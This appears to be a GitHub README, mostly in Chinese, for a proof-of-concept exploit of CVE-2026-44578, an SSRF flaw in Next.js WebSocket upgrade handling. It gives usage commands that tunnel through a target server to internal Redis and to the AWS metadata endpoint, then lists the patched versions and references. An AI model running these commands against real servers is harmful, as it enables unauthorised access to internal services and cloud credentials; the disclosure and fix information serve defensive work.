tocong282/CVE-2026-44578-PoC

# CVE-2026-44578 - Next.js WebSocket SSRF PoC **漏洞：** Next.js WebSocket 升级处理程序中的服务端请求伪造（13.4.13 → 15.5.15，16.0.0 → 16.1.6） ## 用法 ``` # 检测漏洞 python3 poc.py target.com:3000 --detect # 隧道到内部 Redis python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n" # 隧道到 AWS 元数据 python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n" ``` ## 修复 升级到 Next.js 15.5.16 或 16.2.5 版本 ## 参考 - https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2 - GHSA-c4j6-fc7j-m34r

标签：AWS元数据, CISA项目, CVE-2026-44578, GHSA-c4j6-fc7j-m34r, IP 地址批量处理, PoC, Python, Redis未授权访问, SDLC, SSRF, WebSocket, 中间件漏洞, 依赖分析, 内网穿透, 插件系统, 无后门, 暴力破解, 服务端请求伪造, 网络安全, 逆向工具, 隐私保护